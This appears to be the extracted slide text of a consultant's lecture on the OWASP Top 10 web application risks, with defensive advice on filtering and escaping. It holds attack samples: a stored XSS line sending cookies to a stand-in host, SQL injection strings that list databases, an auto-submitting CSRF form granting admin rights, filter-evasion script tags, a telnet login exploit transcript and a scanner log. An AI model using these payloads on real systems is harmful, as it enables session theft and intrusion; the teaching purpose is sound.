1. The top 10 security issues
in web applications
ir. Walter Belgers, CISSP, CISA
2. Walter Belgers
• Principal Security Consultant and
Partner at Madison Gurkha B.V.
• Close to 20 years of professional experience
in technical IT security
3. • Madison Gurkha supports organisations with high
quality services to efficiently identify, decrease and
prevent IT security risks
• With a focus on technical security aspects
7. OWASP TOP-10 2010
A1 - Injection A6 - Security Misconfiguration
A2 - Cross Site Scripting A7 - Insecure Cryptographic
(XSS) Storage
A3 - Broken Authentication A8 - Failure to Restrict URL
and Session Management Access
A4 - Insecure Direct Object A9 - Insufficient Transport
References Layer Security
A5 - Cross Site Request A10 - Unvalidated Redirects
Forgery (CSRF) and Forwards
8. A10 - Redirects
• The site sends you to a URL that can be
manipulated
• That in turn can be encoded in a normal looking
URL
• Phishing attack
9.
10. A9 - TLS
• HTTP versus HTTPS
• Protocol: SSLv2, SSLv3, TLSv1
• Crypto-algorithm: several
• Certificates
• Marking session cookies as ‘secure’
11. A9 - TLS
• The purpose of SSL
• Actually only useful for untrusted
(WiFi-)networks
• Do you pay attention all of the time?
• VPN
• Firefox (Chrome) plugin: perspectives
12.
13. A8 - Restricting URL’s
• Page can be retrieved without authentication
• Programming error
• Page can only be retrieved if you know the “secret
URL”
• “Security through obscurity”
14. <script language="javascript">
<!--//
/*This Script allows people to enter by using a form that asks for a
UserID and Password*/
function pasuser(form) {
if (form.id.value=="buyers") {
if (form.pass.value=="gov1996") {
location="http://officers.federalsuppliers.com/agents.html"
} else {
alert("Invalid Password")
}
} else { alert("Invalid UserID")
}
}
//-->
</script>
16. A7 - Crypt. Storage
• Data in a database should (maybe partially) be
encrypted/hashed
• Passwords, credit card data, ..
• Of importance when data leaks out
20. Exploits
[~] walter> telnet -l '-fbin' 194.151.35.251
Trying 194.151.35.251...
Connected to blade.madison-gurkha.com.
Escape character is '^]'.
Last login: Tue Sep 25 09:52:33 from 194.151.35.85
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
21.
22. - Nikto v2.1.3/2.1.4
+ Target Host: www.<host>.nl
+ Target Port: 80
+ GET /0WAEdrRg.php: Retrieved x-powered-by header: ASP.NET
+ GET /0WAEdrRg.axd: Retrieved x-aspnet-version header: 2.0.50727
+ GET /robots.txt: robots.txt contains 36 entries which should be
manually viewed.
+ HEAD /: Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0
for Win2k, current is at least 7.5)
+ GET /: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ GET /: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ GET /webmail/blank.html: /webmail/blank.html: IlohaMail 0.8.10
contains an XSS vulnerability. Previous versions contain other
non-descript vulnerabilities.
+ GET /webmail/: /webmail/: Web based mail package installed.
+ OSVDB-3093: GET /webmail/lib/
emailreader_execute_on_each_page.inc.php: /webmail/lib/
emailreader_execute_on_each_page.inc.php: This might be
interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /webmail/src/read_body.php: /webmail/src/
read_body.php: This might be interesting... has been seen in web
logs from an unknown scanner.
+ OSVDB-3092: GET /er/: /er/: This might be interesting... potential
country code (Eritrea)
23. Configuration files
• Old files (x.bak, x.old, x~, Copy of x)
• Google cache, Way Back machine
• .htaccess files
• /robots.txt
• Source revision control files
• Include files
• PHP files not ending in .php
24.
25.
26.
27. A5 - CSRF
• Cross Site
• The attack page is on the site of the attacker
• Must be visited (e-mail?)
• Request Forgery
• Often a POST-request with specially
constructed values
• You have to be logged in to the target site
28. CSRF in a CMS
<form name=“csrf” action="http://cms.example.com/?page=/
&action=admin&subaction=editgroups&groupname=admin" method="post"
<input type="hidden" name="txtUserEmail" value="myemail@example.com">
<input type="hidden" name="btnAddUserToGroup" value="Add User to Group">
</form>
<script>
document.csrf.submit();
</script>
32. A3 - Broken Session Mgmt
• Is there a session timeout?
• How many simultaneous logins are allowed?
• Can you change systems within a session (different
IP number)
• Is there a logout button?
• Are credentials sent using a secure connection?
(A9)
• How often can you try logging in per user?
33. A3 - Broken Session Mgmt
• Do you get to know what was wrong when
logging in fails?
• Does the server (also) invalidate the session
cookie when logging out?
• Does the URL contain session id’s?
https://example.com/prepaid/customer/
login.html;jsessionid=F0382A6E8172DC7B8D90599B12AECE16
• Session fixation problems
34. A2 - XSS
• Cross Site
• The victim’s browser redirects from the
vulnerable site to the attacker’s site
• Scripting
• This happens by executing JavaScript in the
victim’s browser
• Goal: stealing session credentials (cookies)
35. Stored XSS
• The attacker can leave behind input that is being
shown to (other) visitors of the site
• Profile information
• Messages
• ...
36. Stored XSS
Your message:
This is my message.
<script>document.location=‘http://
example.com/’+document.cookie</script>
40. A1 - Injection
• Problem: data gets mingled with “program code”
• PHP, Perl, ..
• But also: SQL, LDAP, ..
41. Old problem
• In-band signalling
• Well-known from
telephony
• Hot again! foto: woz.org
42. Typical setup
Internet
Inernet
HTTP
www
SQL
Internal
Intern
Internal
network
netwerk
network db
43. SQL injection
Your name please: walter
Name: Balance:
walter €100
SELECT * FROM users WHERE name=“$name”
SELECT * FROM users WHERE name=“walter”
44. SQL injection
Your name please: ” OR “a”== “a
Name: Balance:
walter €100
guido €1000
hans €2000
SELECT * FROM users WHERE name=“$name”
SELECT * FROM users WHERE name=“” OR “a”==“a”
45. Real-Life Example
• Bank site
• With a search function
• We enter as search string:
<script>alert(‘test’)</script>
• This running Macro ‘odbc’: Error in line 2: Incorrent syntax near
Error
yields:
‘test’. (SELECT nr, subject FROM pagedb WHERE (subject LIKE
‘%<script>alert(‘test’)</script>’ order by subject) (source:
Microsoft OLE DB Provider for SQL Server)
46. SQL injection
• Input frut’) or 1=1-- yields all pages
• Input frut’) union select 0, @@version from
pagedb-- yields information about the type of
software being used
• Input frut’) union select dbid, name from
master..sysdatabases-- yields a list of databases
47. Injection
• Input fields
• Are sometimes/often “secured” with JavaScript-
code
• That code runs in the browser
• If the user allows it to..
48. Injection
• In addition to input fields:
• URL’s (GET requests)
• Hidden fields (POST requests)
• Cookies
• Other data in the HTTP-headers (e.g. referer)
49. Local proxy
Internet
Inernet
HTTP
www
SQL
Internal
Intern
Internal
network
netwerk
network db
58. Input filtering
• Helps prevent A1, A2, A4, A8 and A10!
• Check all input before storing, processing or
showing it
• Data in URL’s, forms, cookies, HTTP-headers,
etc.
59.
60. Input filtering
• White-list filtering: only allow certain characters
• Black-list filtering: remove ‘dangerous’ characters
61. Black list filtering
• <SCRIPT>
<script> • <␣script>
• %3Cscript>
• “<sc”+“ript”>
• <b onmouseover=“...”>
62. Escaping of output
• Rewriting ‘dangerous characters’
• For example < instead of <
• The rewriting depends on where it must be done!
63. Escaping of output
• In the template: <p>%(foo)</p>
• We request: http://example.com/?
foo=<script>alert(document.cookie)</script>
• We get: <p><script>alert(document.cookie)</
script></p>
• Escaping: rewriting < > into < >
64. Escaping of output
• In the template: <input name=“foo” value=“%
(foo)” />
• We request: http://example.com/?
foo=”%20onmouseover=“alert(document.cookie)
• We get: <input name=“foo” value=“”
onmouseover=“alert(document.cookie)” />
• Escaping: rewriting “ into "
65. Escaping of output
• In the template: <script>var foo=‘%(foo)’, bar=‘%
(bar)’;</script>
• We request: http://example.com/?foo=
&bar=;alert(document.cookie);//
• We get: <script>var foo=‘’,
bar=’;alert(document.cookie);//
67. Secure programming
• Not many programmers have a background in
‘secure programmin’
main(int argc, char* argv[]) {
char *buf[2000];
int len;
len = atoi(argv[1]);
if (len > 2000) {
printf("Too much input!n");
exit(-1);
}
memcpy(buf, argv[2], len);
}
68. Tips and tricks
• A2: use the ‘HttpOnly’ option for session cookies
• A3: generate a new session
cookie on the login page
• A5: use a nonce
• Sometimes, a framework can help
69. What to do? (1)
• Learn programmers how to write secure code
• Create a security specification next to the
functional specification
• Also when the application is
bought from a supplier
• Abuse cases
• Auditing
70. What to do? (2)
• If All Else Fails... (and it will)
• Multiple layers of defense
(prevention)
• Logging and monitoring (detection)
• Emergency plan (reaction)
71. Web application security
• There are no fantastic
automated tools
• With a good brain and tools
like Burp Suite, every
web application can be
tested well